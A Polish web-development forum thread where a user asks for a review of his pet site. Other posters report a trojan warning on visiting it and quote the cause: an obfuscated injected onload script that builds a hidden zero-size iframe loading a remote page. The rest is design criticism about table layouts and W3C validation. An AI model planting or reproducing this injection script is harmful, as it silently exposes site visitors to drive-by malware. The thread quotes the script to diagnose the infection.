Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [ocena] www.pets4you.pl
Forum PHP.pl > Inne > Oceny
busyboy
Witam,

Chciałbym Was prosić o ocenę mojej strony, co o niej sądzicie, co byście zmienili ?

http://www.pets4you.pl

Pozdrawiam

BusyBoy
trucksweb
nie wiem czy przypadek, ale przy probie wejscia na strone probuje sie zainstalowac trojan !

reszty nie sprawdzam dry.gif

Kaspersky IS 7.0
devnul
pewnie winne jest to cudo na końcu dokumenty
Kod
<html><body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh='t';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab='src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);
"></body></html>

tak się kończy stawianie stron na gotowych systemach i nieaktualizowanie ich

co do samej strony:
* tabele
* przeciętna, żeby nie powiedzieć brzydka
* dalej nie ma sensu się wypowiadać
.radex
O lol.... Czy ludzie nigdy nie nauczą się pojęcia "walidator w3c" - co to jest, po co to jest i jak tego używać? Chyba jednak nie.
piotrooo89
mnie sie nie podoba... i tyle takie moje zdanie...

ocena 1/10
busyboy
Co do systemu - to nie jest gotowiec tylko pisany od podstaw.
.radex
Cieszymy się niezmiernie, ale... przecież my oceniamy tylko frontend.
busyboy
Ok rozumiem i wlasnie o to Was prosiłem, co do wygladu co byscie konretnie zminili ?

A co do walidator w3c juz poprawilem.
devnul
Cytat
A co do walidator w3c juz poprawilem.

nie poprawiłeś, validator nadal zgłasza błędy, poza tym walidator sprawdza tylko teoretyczną poprawność składni. Powiem to jeszcze raz: tabele nie służą do budowy layoutów a do prezentacji danych tabelarycznych (zestawienia, dane ekonomiczne itp). Jak to zmienisz to dopiero powiedz że poprawiłeś "validator w3c"
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.